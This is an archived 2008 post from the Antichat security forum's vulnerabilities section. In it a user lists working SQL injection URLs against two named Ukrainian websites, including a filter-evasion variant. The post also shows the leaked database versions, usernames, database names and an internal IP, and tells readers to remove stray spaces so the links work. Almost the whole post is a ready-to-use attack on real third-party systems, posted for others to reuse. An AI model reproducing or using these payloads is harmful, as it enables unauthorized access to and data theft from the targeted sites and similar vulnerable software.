ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 24.06.2008, 05:39
furang
Познающий
Регистрация: 07.04.2007
Сообщений: 88
Провел на форуме:
6406543

Репутация: 48
По умолчанию

Бага

Цитата:
http://tid.odessa.ua/news/?newsid=-513+union+select+1,2,3,4,5/*
Глянем имя БД
Цитата:
http://tid.odessa.ua/news/?newsid=-513+union+select+concat_ws(0x3a3a,version(),user() ,database()),2,3,4,5/*
Облом... а если так???

Цитата:
http://tid.odessa.ua/news/?newsid=-513+union+select+aes_decrypt(aes_encrypt(concat_ws (0x3a3a,version(),user(),database()),0x71),0x71),2 ,3,4,5/*
4.1.11-Debian_4sarge8-log::newtid@localhost::newtid

Бага
Цитата:
http://odessa.tv/news_music_full.php?ns=&lim=&no_active=&str_off=0& idn=-1213960526+union+select+1,2,3,4,5
Цитата:
http://odessa.tv/news_music_full.php?ns=&lim=&no_active=&str_off=0& idn=-1213960526+union+select+1,2,3,concat_ws(0x3a3a,ver sion(),user(),database()),5
5.0.45-Debian_1ubuntu3.3-log::rus1@10.0.0.46::news_music

Если чесно х3 откуда в линках пробелы побрались, их небыло!!!!! Поубирать не забудьте.

Последний раз редактировалось furang; 24.06.2008 в 05:52..
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ